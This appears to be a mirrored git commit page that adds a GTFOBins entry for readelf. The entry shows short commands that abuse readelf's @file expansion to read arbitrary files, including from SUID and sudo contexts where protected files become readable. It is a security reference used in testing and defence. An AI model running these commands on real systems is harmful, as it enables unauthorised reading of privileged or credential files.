1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-06-21 22:19:08 +02:00

Create readelf.md

This commit is contained in:
0rbz 2018-12-31 14:58:24 -05:00 committed by GitHub
parent 9652aee337
commit 6ebfcef36c
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

18
_gtfobins/readelf.md Normal file
View File

@ -0,0 +1,18 @@
---
description: |
Each line is corrupted by a prefix string and wrapped inside single quotes.
functions:
file-read:
- code: |
LFILE=file_to_read
readelf -a @$LFILE
suid:
- code: |
LFILE=file_to_read
readelf -a @$LFILE
sudo:
- code: |
LFILE=file_to_read
sudo readelf -a @$LFILE
---